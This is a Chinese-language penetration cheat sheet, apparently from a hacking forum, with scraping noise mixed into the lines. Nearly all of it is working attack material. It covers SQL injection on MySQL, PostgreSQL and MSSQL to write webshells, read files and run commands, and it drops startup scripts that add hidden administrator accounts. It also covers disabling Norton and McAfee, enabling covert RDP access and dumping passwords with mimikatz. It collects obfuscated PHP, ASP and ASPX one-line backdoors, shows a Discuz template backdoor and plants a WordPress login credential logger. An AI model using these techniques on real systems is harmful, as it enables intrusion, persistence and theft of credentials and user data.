" J/ L. u t5 [9 Z) S9 @, g
中文版本操作系统中针对mysql添加用户完整代码:4 V% {7 c' Y% m% g( W3 n3 c" J& P
' T" M( ]) G# M4 _) Q0 f: l3 g' E n6 t
use test;: Z& }5 w/ @6 x5 A0 N u1 X
create table a (cmd text);3 U# C6 t6 s( h% H: I" V2 b5 h. E
insert into a values ("set wshshell=createobject (""wscript.shell"") " );
: R w0 L) ]* `6 B) O/ r1 Ginsert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );4 [( k0 E- ?! o; [3 n
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );
* N9 @9 @# F: E, _9 l4 P( |+ `select * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs";3 i2 }) t r, C; f& u% _, W
drop table a;6 ^# v6 q, m! k( M( a
6 P7 m. A! w% k& q* }
英文版本:
~+ H- @- J+ y4 K7 p& y$ }
. Z- `% f) @6 wuse test;
7 [* h5 X% ]. N0 C. {6 @3 ncreate table a (cmd text);
6 l0 u( F1 R, t+ _, S" Y2 o7 ginsert into a values ("set wshshell=createobject (""wscript.shell"") " );- n$ w8 ~8 l( [& f4 m; B+ e+ ~
insert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );$ v6 W0 l) y# I6 z8 n2 C
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );* V; {* Q% L% M8 c
select * from a into outfile "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\a.vbs";( k: ?6 M8 f5 t+ z" F! d
drop table a;+ K x/ @9 [6 u
9 W) a3 l7 k) h0 screate table a (cmd BLOB);9 ~( ]! I& L- W
insert into a values (CONVERT(木马的16进制代码,CHAR));8 ?4 q( ]1 g* ?1 c% K( }8 b; @9 d
select * from a into dumpfile 'C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\启动\\mm.exe'2 [9 `: N/ Y( l- @* h
drop table a;1 o+ s) K! X" V( f
9 R& r" C! Y1 O$ X
记录一下怎么处理变态诺顿
( e7 Z& Z% v: U% c G, u查看诺顿服务的路径+ K+ R8 ]2 w% [% Q, e* ?; C
sc qc ccSetMgr1 C- W9 T& f, Q1 b
然后设置权限拒绝访问。做绝一点。。
7 L8 V. T; }/ T& J! ]5 E! Tcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d system
4 }! A% h6 M7 A# V: bcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d "CREATOR OWNER"
: g7 [9 C8 Z0 t/ d5 d8 Bcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d administrators. D0 C/ o" l8 A; h/ A+ R6 M/ X
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d everyone
$ R- D7 ?5 R6 e7 c2 x
/ u3 G' c; [4 g& q然后再重启服务器) Y/ l2 Q8 m$ f2 S
iisreset /reboot' j7 u O r% h; _3 A6 M1 c
这样就搞定了。。不过完事后。记得恢复权限。。。。# `! b' a/ t' s- o
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G system:F
. p' w' }$ g- P! o2 h U+ j! d/ Ecacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G "CREATOR OWNER":F( {! Z+ Z! Z. U q0 z
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G administrators:F
$ q2 Y8 H" S7 u0 ^5 l/ ycacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G everyone:F' M& m0 M5 G/ R `
SELECT '<%eval(request(chr(35)))%>' into [fuck] in 'E:\asp.asp;fuck.xls' 'EXCEL 4.0;' from admin& r/ K7 Y5 @+ K( k
8 l$ _. l& G7 n( J% @: r
EXEC('ma'+'ster..x'+'p_cm'+'dsh'+'ell ''net user''')2 I* S& I- ~7 T& e8 g, e% |) |
, ^! n ]4 A# R
postgresql注射的一些东西
/ @; J# n" M7 _. ~* x# d4 u1 K! t. P如何获得webshell
7 Y3 O) Q+ Q1 g& D* o. e9 Thttp://127.0.0.1/postgresql.php?id=1;create%20table%20fuck(shit%20text%20not%20null);
4 \6 Z2 C) |' l# q% vhttp://127.0.0.1/postgresql.php?id=1;insert into fuck values($$<?php eval($_POST[cmd]);?>$$); 7 L4 \, q g. u+ y5 m$ I- B* A
http://127.0.0.1/postgresql.php?id=1;copy%20fuck(shit)%20to%20$$/tmp/test.php$$;
! \0 M z- O( L, x! P' b& N7 ~如何读文件
9 j1 Q! l) b3 xhttp://127.0.0.1/postgresql.php?id=1;create table myfile (input TEXT);
7 k/ L! m3 p% `+ A. P3 zhttp://127.0.0.1/postgresql.php?id=1;copy myfile from ‘/etc/passwd’;: h! z7 W0 U. S$ `7 x7 r/ k% ]! `
http://127.0.0.1/postgresql.php?id=1;select * from myfile;$ o5 T: }2 i0 v* e/ Z
* }: J: z1 H( j4 c7 x6 h
z执行命令有两种方式,一种是需要自定义的lic函数支持,一种是用pl/python支持的。
; D" I. X# f7 T1 g) @( \# N2 b当然,这些的postgresql的数据库版本必须大于8.X7 g6 h1 G' J7 L! A
创建一个system的函数:- D, x8 u: V& [4 T. D
CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6', 'system' LANGUAGE 'C' STRICT s2 A& u* i* h' P7 v% m% B: |
# m, f Z: o4 F. c7 b g/ C创建一个输出表:
7 N; m" c8 J; |7 r2 f Q2 xCREATE TABLE stdout(id serial, system_out text)1 U2 V; k6 ~3 r" b0 v
+ D2 x0 i+ x% A8 g执行shell,输出到输出表内:
! O3 C4 N7 b# s! C% oSELECT system('uname -a > /tmp/test')
' |! m. D- A n1 _+ b5 |' G: C& u4 e4 ]1 O6 \7 X' g0 _3 U- I$ W' Q# W
copy 输出的内容到表里面;
$ w' q+ ]* |) ?% UCOPY stdout(system_out) FROM '/tmp/test'1 x/ a, Q5 g6 W% B# o9 b8 y5 R# X q
& _9 P: ^, x1 p6 P/ R$ Y7 r从输出表内读取执行后的回显,判断是否执行成功0 V9 L% x6 i! L
, g/ ^- s0 W2 Q, q: k, A4 Y
SELECT system_out FROM stdout; C2 _- b6 m7 [
下面是测试例子
) d z) C+ s6 i
( i3 V* t: r( o$ z: T% K/store.php?id=1; CREATE TABLE stdout(id serial, system_out text) -- , S/ h$ O4 G& i$ D
# o/ C: Z8 S. I" I/store.php?id=1; CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6','system' LANGUAGE 'C'0 u. `3 o* O* x5 ]- z1 J: Y
STRICT --
$ W. J' S7 O+ p2 p) N% T! t/ r3 M0 X& P& A
/store.php?id=1; SELECT system('uname -a > /tmp/test') --
: J! u/ l8 z5 H" O2 i W8 I0 a/ z3 R4 H7 J! x E. q& [* {& g2 _/ a
/store.php?id=1; COPY stdout(system_out) FROM '/tmp/test' -- N5 Y, P% P. O9 @# J9 u
+ C! j/ ~1 { W2 L/ B9 I2 K/store.php?id=1 UNION ALL SELECT NULL,(SELECT stdout FROM system_out ORDER BY id DESC),NULL LIMIT 1 OFFSET 1--
8 ], H( T3 I0 z9 }+ u+ A$ nnet stop sharedaccess stop the default firewall
3 N6 J1 V/ Z# A; |% ynetsh firewall show show/config default firewall# ~2 d9 [; s! S+ ]6 P0 H- d
netsh firewall set notifications disable disable the notify when the program is disabled by the default firewall
! `. w4 m: Q: ~! y* S, s# ^netsh firewall add allowedprogram c:\1.exe Svchost add the program which is allowed by default firewall7 k$ I6 n# e' J; y# o0 i% G# n
修改3389端口方法(修改后不易被扫出)
2 r9 U7 @$ W7 }% p% l- U5 f修改服务器端的端口设置,注册表有2个地方需要修改" W4 `% _7 c F; |% S L" Q
8 z) `( d$ `/ G
[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\TerminalServer\\Wds\\rdpwd\\Tds\\tcp]. r7 Y6 o+ C: j1 x7 E; l7 |
PortNumber值,默认是3389,修改成所希望的端口,比如6000
, @( f) h, t2 E) g/ f: Y2 ?9 Y
" s9 h/ `* E9 P5 D0 s第二个地方:8 i3 c2 t, \% o: [. Y2 o
[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp] ! y6 A& y- L9 L% I
PortNumber值,默认是3389,修改成所希望的端口,比如60001 Q* W7 g1 H7 M5 p" W- V6 O8 Z
- d- h3 D# c- {# Z2 _9 [8 c3 n3 t现在这样就可以了。重启系统就可以了: s [% J7 j0 d! n: u
/ P P# D+ y: J, ]: @ |6 }2 u
查看3389远程登录的脚本
" s3 j0 N* x2 M1 l3 ~保存为一个bat文件
! |% X6 |/ A9 S+ {; ?date /t >>D:\sec\TSlog\ts.log$ Z [: [2 g* k- e9 X
time /t >>D:\sec\TSlog\ts.log! Q5 y4 j- ^& s! O
netstat -n -p tcp | find ":3389">>D:\sec\TSlog\ts.log
f; o' j; H; ^( Fstart Explorer
/ T8 ~9 B' H( n9 f _* j; _1 G" K% u, G g5 d; y! [, W) D6 x8 a- q+ I
mstsc的参数:2 A5 X6 |. |. F/ B4 d
" i/ {# x/ G" t" v! x
远程桌面连接
; c% ~3 f" o! ]7 Z2 o# O6 s2 p9 k$ F9 e3 V4 m: j$ E
MSTSC [<Connection File>] [/v:<server[:port]>] [/console] [/f[ullscreen]]5 z/ b# B2 \1 z, N6 G7 e: [
[/w:<width> /h:<height>] | /Edit"ConnectionFile" | /Migrate | /?* j! }$ {! ~! p. _2 Z( e& Z
6 ]9 _7 y3 J; Q: N6 u: K: c0 |5 I<Connection File> -- 指定连接的 .rdp 文件的名称。
( x; r' e9 M. M2 v9 I& o+ T) U7 R8 ?: R9 Y
/v:<server[:port]> -- 指定要连接到的终端服务器。) ?: ^" x! ?, h' y. D+ S
6 W- b D$ M }2 H5 j: A, ?% F3 f: Q
/console -- 连接到服务器的控制台会话。
7 b! v- B- @ _( u t |4 ?4 F" U
% c) @8 N; ^4 ~1 e# C/f -- 以全屏模式启动客户端。
. z6 n3 k% {) j, x l/ g/ \& _+ E" f8 c/ U- t3 Y7 B" d) m0 z
/w:<width> -- 指定远程桌面屏幕的宽度。
( r' \4 E/ l. W/ Q7 t `
; m0 D. }, S, z$ W9 t2 Q/h:<height> -- 指定远程桌面屏幕的高度。
$ _9 O& T* Q& V+ J. r7 W& s$ a# I: {2 ~8 `( c4 W
/edit -- 打开指定的 .rdp 文件来编辑。
1 _2 A3 W, E& e1 O9 ^/ ~$ Y) U3 V* A1 f- j1 n7 u) s
/migrate -- 将客户端连接管理器创建的旧版
# ]/ n# [! a% Z9 @0 K连接文件迁移到新的 .rdp 连接文件。
' N: u, ~- ~" j. Z' o
: U( V, Y3 h3 s
1 f- I5 y! _. T1 {其中mstsc /console连接的是session 0,而mstsc是另外打开一个虚拟的session,这样的话就是相当与另外登陆计算机。也就是说带console参数连接的是显示器显示的桌面。大家可以试试啊,有的时候用得着的,特别是一些软件就5 l2 ~' e3 f; e- W3 }
mstsc /console /v:124.42.126.xxx 突破终端访问限制数量
. ~3 j% _* D; ~, B7 g1 L
/ i# m' F/ j0 z命令行下开启3389) c. x+ h8 B4 `; A. t7 L9 {
net user asp.net aspnet /add
# S% D% o* r0 w. `$ pnet localgroup Administrators asp.net /add
! _. |6 H* G" }, n) V- X9 hnet localgroup "Remote Desktop Users" asp.net /add- t! \+ |! w! g6 A( d! i
attrib +h "%SYSTEMDRIVE%\Documents and Settings\asp.net" /S /D
z6 F3 L% |' Q6 E# Secho Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t reg_dword /d 0
% G! e4 L8 O" u! L3 ]* ~echo Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowTSConnections /t reg_dword /d 10 k/ d& ^# w2 E6 J) F# B& c
echo Y | reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "asp.net" /t REG_DWORD /d 00000000 /f
. n, E- I% f. |% m8 _# a, Z& W, h Psc config rasman start= auto
( [, W! T7 g/ a! bsc config remoteaccess start= auto: e. w7 [4 O3 {+ }2 s
net start rasman
# h6 U5 m" t; K8 V5 r; P Cnet start remoteaccess& P8 y( v* M8 A5 |9 ?! [# p
Media
) u6 t8 K: w/ d- [8 A" Y; i<form id="frmUpload" enctype="multipart/form-data"
% I$ ^& ?/ Q9 l* O0 @action="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>
2 |4 m& J! s( X, L0 q! D<input type="file" name="NewFile" size="50"><br>4 ~+ g* d0 \' y+ I8 t' m0 c
<input id="btnUpload" type="submit" value="Upload">
4 ^: W% r4 t" n8 J+ e/ j; J" o0 x</form>
$ I U! Y; U1 {8 e) R( }7 J, N" z" m+ m4 Q
control userpasswords2 查看用户的密码/ G% G! X( f" w, w }
access数据库直接导出为shell,前提a表在access中存在。知道网站的真实路径
/ l2 p& ]3 ~" J* A- lSELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a
* z- N+ m X: G/ W; t, {
( @. k3 n+ _: J& }141、平时手工MSSQL注入的时候如果不能反弹写入,那么大多数都是把记录一条一条读出来,这样太累了,这里给出1条语句能读出所有数据:
$ g T* n a- d) E+ L, i测试1:2 k3 R% `- W1 E* E2 z2 S' r
SELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t16 G- Y k+ U n$ n" u
% z: r7 r/ s) e4 x测试2:
$ n9 J0 y# ^5 W& ]+ H% R! S, e2 T5 R$ [( q' E4 P+ r
create table dirs(paths varchar(100),paths1 varchar(100), id int)" d0 Q- w" t6 C
9 D* h. f! W" X+ S8 h3 ?& j
delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--" d1 r% f& a- R0 J8 P
* g/ ? j- @5 A% D; L( S7 z* @
SELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t15 t; W# b }: M p4 F7 E7 K1 s
关闭macfee软件的方法://需要system权限,请使用at或psexec –s cmd.exe命令) q; K2 g1 i. {; T
可以上传.com类型的文件,如nc.com来绕过macfee可执行限制;' R" Z8 _' S f4 C7 O; h7 c
net stop mcafeeframework7 p: X! T. M m% N4 F# s, i
net stop mcshield6 E" n! a5 L9 x* ]
net stop mcafeeengineservice4 F7 X, ~9 K8 @3 A
net stop mctaskmanager
& ]' o5 O7 P0 P9 \& {0 r; y- qhttp://www.antian365.com/forum.p ... DU5Nzl8NDY5Mw%3D%3D
- V& O* T( p6 E3 L0 X' Y9 v# w8 t. M W
VNCDump.zip (4.76 KB, 下载次数: 1)
8 E Y1 W, N8 E9 g' @ b密码在线破解http://tools88.com/safe/vnc.php; T b. T3 N* ?. a, L& s! {
VNC密码可以通过vncdump 直接获取,通过dos查询[HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4] 下的Password也可以获取. c1 b0 b( a- D; C5 N* P/ x; P
5 B3 w" K9 V+ {5 V% ]) w$ P( A5 @
exec master..xp_cmdshell 'net user'/ B: M- x( J( ?! |2 t' n
mssql执行命令。
0 `# ~& ?0 K: l, ^ N, D3 p2 H3 u获取mssql的密码hash查询 i9 N" p$ C9 H, |
select name,password from master.dbo.sysxlogins8 }* r: |% m) Z1 _5 v
y4 `; X+ W7 e( o0 Z5 E+ Q+ ybackup log dbName with NO_LOG;# l' W/ R5 _& j" e
backup log dbName with TRUNCATE_ONLY;$ a& T: h5 g+ k$ i8 v* M* q
DBCC SHRINKDATABASE(dbName);1 J$ v! L* A, {
mssql数据库压缩# w& w3 R; y e4 V5 ~( V4 W
8 ~8 C$ ]5 h2 q0 r8 Y
Rar.exe a -ep1 -m0 -v200m E:\web\1.rar E:\webbackup\game_db_201107170400.BAK
# N# U; r6 O) k0 b' ]* S, E将game_db_201107170400.BAK文件压缩为1.rar,大小为200M的分卷文件。
" ]: \* o5 X- |9 W8 b& b
) t; P0 g9 Y O5 j5 k& Wbackup database game to disk='D:\WebSites\game.com\UpFileList\game.bak'
+ Q9 r9 `' N4 @; ^5 U备份game数据库为game.bak,路径为D:\WebSites\game.com\UpFileList\game.bak5 Z% Z+ }: x g+ a( n
, V- t2 g7 A9 }0 z
Discuz!nt35渗透要点:) p6 p, g0 E* A2 c: y, e
(1)访问 网站地址/admin/global/global_templatesedit.aspx?path=../tools/&filename=rss.aspx&templateid=1&templatename=Default
4 }) `9 L9 W9 U C9 ?1 S+ y* w(2)打开rss.aspx文件,将<%@ Page Inherits="Discuz.Web.UI.RssPage" %>复制到本地备份,然后替换其为<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>1 s0 }+ ^9 {4 Y4 b; Y
(3)保存。
, ~+ ?# A+ z. G# U(4)一句话后门地址http://somesite.com.cn/tools/rss.aspx 密码为pass4 l" o o# Q& k9 ?
d:\rar.exe a -r d:\1.rar d:\website\
2 p H& m7 s1 A* {4 G( m递归压缩website
% }8 S `0 J8 V' ?5 G注意rar.exe的路径0 M m7 N0 V) H" K) V: [
* X) K% C* b7 `7 i3 Q6 C! v$ P
<?php
% g0 q+ G5 U) L( z9 f2 t
6 {1 S7 q. S' C% j, W& k$telok = "0${@eval($_POST[xxoo])}";
2 P4 ~: J2 N' E- p3 v* }" s7 f8 o; Y
. r5 a) y+ `! m' e1 L$username = "123456";
* q5 G1 a" K8 h
) b4 T" b6 t; r8 t) Y( g* J$userpwd = "123456";" `8 e; |( R( A& A0 K' ~5 J
( W5 g2 P2 F- d1 s/ n# Z
$telhao = "123456";! P6 {" E% V U% S) ]
. X- R, J/ _5 l8 ^% J2 ^
$telinfo = "123456";/ k. A+ y( B- A4 M1 N! F. B
9 w( Y8 M7 x5 r& X2 Z& H) D1 D?>5 h S" k/ f7 e8 V* B+ n
php一句话未过滤插入一句话木马, C7 D& ~+ k2 w4 K/ C$ z! a8 L
5 u0 P9 u/ ~- C2 s. j( j
站库分离脱裤技巧2 |7 h5 R' q9 v- u' r
exec master..xp_cmdshell 'net use \\xx.xx.xx.xx\d$\test "pass" /user:"user"'
( V+ H! X( n9 b4 {2 |exec master..xp_cmdshell 'bcp test.dbo.test out \\xx.xx.xx.xx\d$\test\1.txt -c -Slocalhost -Uuser -Ppass'
* N4 y- @/ t- {条件限制写不了大马,只有一个一句话,其实要实现什么完全够了,只是很不直观方便啊,比如tuo库。: }6 |+ X9 S+ T" b' L, M9 u1 v
这儿利用的是马儿的专家模式(自己写代码)。
/ s& j3 o$ ?$ u! s' N6 h. Lini_set('display_errors', 1);
x- f; Z" c6 E2 s: Xset_time_limit(0);' x/ B0 g( |9 I6 I/ Z, X
error_reporting(E_ALL);3 j7 g& C' m$ P' u# E# O2 P
$connx = mysql_connect(":/var/tmp/mysql.sock", "forum", "xx!!xx3") or die("Could not connect: " . mysql_error());' B+ W" D0 n: ?% M
mysql_select_db("discuz",$connx) or die("Could not connect: " . mysql_error());. H; D9 `0 x4 G' a6 U! V' t6 K- N; u
$result = mysql_query("Select * FROM members",$connx) or die("Could not connect: " . mysql_error());* `3 o5 r" A% e. o9 \
$i = 0;
$ ]6 `% M3 z: F3 U o6 a+ p$tmp = '';: n: l: y1 n5 C0 F
while ($row = mysql_fetch_array($result, MYSQL_NUM)) {/ l' N! H9 c4 d1 o/ t V
$i = $i+1;
I* L3 Z' R# Z" m7 K0 ~% J2 S $tmp .= implode("::", $row)."\n";
+ x6 G9 O! N6 u/ c, @ if(!($i%500)){//500条写入一个文件, v5 q5 k0 T- C N9 m
$filename = '/home/httpd/bbs.xxxxx/forumdata/cache/user'.intval($i/500).'.txt';
$ D c, O" r2 D f' I9 U file_put_contents($filename,$tmp);) ~4 q& O4 n# h2 J& I6 z/ \
$tmp = '';
) C0 A+ o" l) q) `( y# j }+ o4 {, i' U% Z( V+ r7 s4 P/ p. g. H
}
" J5 U. Z0 l# Y# p! |2 V2 ]0 V1 V Gmysql_free_result($result);% t; O8 B. W( Q
: m9 o% C# t5 p" u% \9 u
4 s7 k }/ x& V8 v5 N: o5 {: y
& l1 I( G2 ~4 o* e//down完后delete
5 a( p+ j$ m8 ]- |$ s( }' Y! Q( e5 o8 H3 ?* x* |% x' y, T' ~$ G
' t7 `; f" C: M/ T$ w- wini_set('display_errors', 1);
: b: t7 F, h3 {) Ierror_reporting(E_ALL);
9 c: r! R& a1 Z' U+ u$i = 0;
2 } e5 d0 e( W! C7 Owhile($i<32) {$ }( ^' a5 l) f- u
$i = $i+1;$ P8 c% X8 X/ y9 z9 [* y
$filename = '/home/httpd/bbs.xxxx/forumdata/cache/user'.$i.'.txt';
, P1 P P" J$ o' H unlink($filename);# [% r: M' `0 ^8 v
}
1 r, n7 E+ Z6 I+ e* F- dhttprint 收集操作系统指纹7 r3 T. }3 B- U# ^4 l
扫描192.168.1.100的所有端口- ^6 D- M L$ n, b& N6 P
nmap –PN –sT –sV –p0-65535 192.168.1.1000 D0 p3 J. F2 A
host -t ns www.owasp.org 识别的名称服务器,获取dns信息
9 ~1 [" }3 w8 i# phost -l www.owasp.org ns1.secure.net 可以尝试请求用于owasp.org的区域传输
6 W/ _9 C' m. H- H6 k" tNetcraft的DNS搜索服务,地址http://searchdns.netcraft.com/?host
7 D% k% J9 r: L* [0 i
, Y* T; |9 s, V- ?Domain tools reverse IP: http://www.domaintools.com/reverse-ip/ (需要免费注册)
. M8 ^6 o2 z; v1 E: c) o3 {+ K2 y$ l% y
3 @4 ]* T" z. {$ c4 O MSN search: http://search.msn.com 语法: "ip:x.x.x.x" (没有引号)( Y- r4 l$ _- L: p& _
# P" K M1 }2 W! y, x2 a Webhosting info: http://whois.webhosting.info/ 语法: http://whois.webhosting.info/x.x.x.x
+ o7 O2 k0 Q9 A* Y5 p: i. p; C. S! Q% J% @2 C2 C: p
DNSstuff: http://www.dnsstuff.com/ (有多种服务可用)
9 O Y2 |* a, ]; C& p3 m' A, S7 k
http://net-square.com/msnpawn/index.shtml (要求安装)
+ u2 K# f- r0 G# H8 O9 D2 r2 C7 _. z* n' B
tomDNS: http://www.tomdns.net/ (一些服务仍然是非公开的)7 g: U- t; A# S8 S' q
8 c7 ^- j# x* c; v1 p# q SEOlogs.com: http://www.seologs.com/ip-domains.html (反向IP/域名查找)
" b8 ~5 _+ { q0 Q6 cset names gb2312
' v$ {. B) U. i e' w导入数据库显示“Data too long for column 'username' at row 1”错误。原因是不支持中文。* G& {/ L* l& h/ D9 k
3 W) R2 F% F* [- X9 C7 M* A. F
mysql 密码修改; A5 [6 [8 j1 D! R
UPDATE mysql.user SET password=PASSWORD("newpass") whereuser="mysqladmin ”
- Y3 P# C% a* u0 u( Xupdate user set password=PASSWORD('antian365.com') where user='root';
, ]( J- X" W4 v G, Y: H5 q1 bflush privileges;/ ]9 j: l+ w/ e! ^2 ?. @. E7 @+ G9 I
高级的PHP一句话木马后门
1 b( z( f$ c9 O' p8 A8 P
K) k' [. w& Z" m入侵过程发现很多高级的PHP一句话木马。记录下来,以后可以根据关键字查杀8 A9 Q: d9 Q9 S/ r$ ^
* @, e6 ?4 H+ u0 y
1、
# {; c/ Y; m- }$ ` F5 l; J
, n% Q9 V- y! T u$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";6 F+ `. t: T2 _# j8 F. a2 a8 V
/ q2 p) P7 r0 A) E# ^0 y
$hh("/[discuz]/e",$_POST['h'],"Access");
) k3 L; b: l0 e5 R* v0 o2 g0 H: F8 H9 l! \0 q" F% v0 r) v
//菜刀一句话
7 |4 b4 _% ~6 o" r, N
7 b S9 ?5 o/ ?2 X I8 A2、; I0 }$ D% t+ W( F/ x2 J
5 Z S2 O; l' R9 V5 a5 a' ?
$filename=$_GET['xbid'];# q. m9 M% r' d) T. d
+ E7 D& f3 H0 V- jinclude ($filename);+ \3 C+ g6 F& {% r$ _
) l V% R* i( F! A! ^# y
//危险的include函数,直接编译任何文件为php格式运行
; o0 d6 r" [* O( U& Q- l* H
6 y5 V# I8 _! S3、
) Y$ ^9 ?1 ?0 W. w
2 S. q! h: }1 ?$reg="c"."o"."p"."y";6 g N" p# Z/ ]! g
* _5 s- }+ r3 A% g' {
$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);" n- m/ ]3 a+ U+ d+ ^# W" s$ K
" o0 ?0 \- i/ O9 L//重命名任何文件" ^& o% g1 D# y) I% j7 P9 |+ G
F0 W" Q2 t5 |
4、: |( O9 }/ t+ p* t& D
6 `0 D+ D# Q! [3 V$gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";( H+ H# H' n. H5 w5 i' q& Z
8 H# z# d0 X1 k* \3 ~7 Q( N
$gzid("/[discuz]/e",$_POST['h'],"Access");
- T3 G/ l& L' n+ U
; @& ]/ d+ b1 Y9 u//菜刀一句话' j9 L1 I" H' f8 l8 \8 r7 S
/ o! y2 d( P3 w5、include ($uid);9 i8 k( t% b+ o g+ P
6 g+ ?* H8 |0 I4 @4 p1 i* g1 O7 h1 z6 o
//危险的include函数,直接编译任何文件为php格式运行,POST
5 r* Z3 x( F m
& k- G7 L4 }8 P3 J: N' \/ Z2 Q ?
//gif插一句话0 @- R# M2 Q- v0 G, @1 Y
* H$ ~- n- W) [
6、典型一句话
* A& C2 H S% R4 Z# L- f! g( m7 a; b/ j: d# `) d( _( Q
程序后门代码" A O5 j4 X, G0 G/ o9 N- U1 d" @
<?php eval_r($_POST[sb])?>
3 O7 U3 N! d5 j! Z, C4 W程序代码
" C9 X4 J" w, l& k, Y# A5 t" X4 ]<?php @eval_r($_POST[sb])?>7 F5 c, \- I9 G+ D* l2 }
//容错代码
& U7 ~8 G2 V7 M) v程序代码
' ^9 V$ e# u5 o( u0 c4 e<?php assert($_POST[sb]);?>
8 q2 r- D" h! D0 e3 Y& z//使用lanker一句话客户端的专家模式执行相关的php语句! Q% ~& q2 Q* x7 `' ]
程序代码$ ~( _1 D5 S) Q. x3 E$ ^
<?$_POST['sa']($_POST['sb']);?>
5 }5 c# _) |5 l8 \5 r" r程序代码/ `; S; V: W% Y2 |4 _
<?$_POST['sa']($_POST['sb'],$_POST['sc'])?># c# b( G: @9 R( |* Z0 ]& y
程序代码' a; _4 D- ~ H) `- K
<?php
2 W) w1 R7 e# s$ j- _4 J# b@preg_replace("/[email]/e",$_POST['h'],"error");
/ I) O: W: ^" j8 Z?>
( |3 { N6 }9 x: g1 U6 ?//使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入5 H6 ]" Q: T% `4 U/ W; s/ ?
程序代码
, x, |+ e# V6 n% [9 Q<O>h=@eval_r($_POST[c]);</O>6 p( Q' ~3 |9 [1 ]: [
程序代码
: C2 W$ c' N. i, b<script language="php">@eval_r($_POST[sb])</script>
- a* F8 R, O: t$ s$ D; N: d0 z# m( L//绕过<?限制的一句话
5 Z, J( m. ^2 I' O" B5 p! f. C% n. f% T' s" `
http://blog.gentilkiwi.com/downloads/mimikatz_trunk.zip
. X. ]( m1 J/ r" ^" B详细用法:
7 M" L( ], V7 x. l2 ~1、到tools目录。psexec \\127.0.0.1 cmd
9 z$ S/ r8 \( ~+ N. y4 D* q c2、执行mimikatz$ T% D4 c: [% e. e V$ h X- } I
3、执行 privilege::debug
( J3 ?: G) D. v3 i3 i" K! S4、执行 inject::process lsass.exe sekurlsa.dll" J) o C) _: A. U, @3 ~
5、执行@getLogonPasswords
& f' S+ ?3 \2 L3 R \' F; p6、widget就是密码3 X9 j$ m9 S& F K
7、exit退出,不要直接关闭否则系统会崩溃。3 y- c5 O, q: ], d2 J
# R4 A( @+ Z$ D4 q9 ]
http://www.monyer.com/demo/monyerjs/ js解码网站比较全面
9 d* H' y P& [0 _
/ d0 a3 U) A5 F自动查找系统高危补丁; e# Q+ G1 j# {4 _
systeminfo>a.txt&(for %i in (KB2360937 KB2478960 KB2507938 KB2566454 KB2646524 KB2645640 KB2641653 KB944653 KB952004 KB971657 KB2620712 KB2393802 kb942831 KB2503665 KB2592799) do @type a.txt|@find /i "%i"||@echo %i Not Installed!)&del /f /q /a a.txt3 n8 Q# @% `5 F7 Q0 t# R
+ R% E v" Z! B& _+ u1 k
突破安全狗的一句话aspx后门
/ v- Z% U" F& H1 z, E8 e* |<%@ Page Language="C#" ValidateRequest="false" %>
) u/ e. W4 U9 I<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["你的密码"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>( M7 ?9 s+ g& {+ K. N4 c
webshell下记录WordPress登陆密码0 {. H3 A8 t* f' u" y/ ^
webshell下记录Wordpress登陆密码方便进一步社工
. {+ q- J5 `5 R5 |) K! p+ N/ H' B6 o在文件wp-login.php中539行处添加:
! X3 D1 |( N4 A, y// log password
# E# A! h% s+ Z% T- }1 O$log_user=$_POST['log'];+ U" O; `1 n) O( s( |' Q! Q
$log_pwd=$_POST['pwd'];, {2 n+ E0 k/ B7 J% ?8 h3 u
$log_ip=$_SERVER["REMOTE_ADDR"];: j9 L$ F* z& [" a
$txt=$log_user.’|’.$log_pwd.’|’.$log_ip;
: M- S9 \ c' l. y+ b$txt=$txt.”\r\n”;; Y+ @& P) l! S4 g
if($log_user&&$log_pwd&&$log_ip){1 k' Y, Q# V7 v; s1 b* |* u
@fwrite(fopen(‘pwd.txt’,”a+”),$txt);% x+ a' Q. f: v* E0 j6 s- s4 y
}6 R, t( U" [. I5 n3 b% ^" {
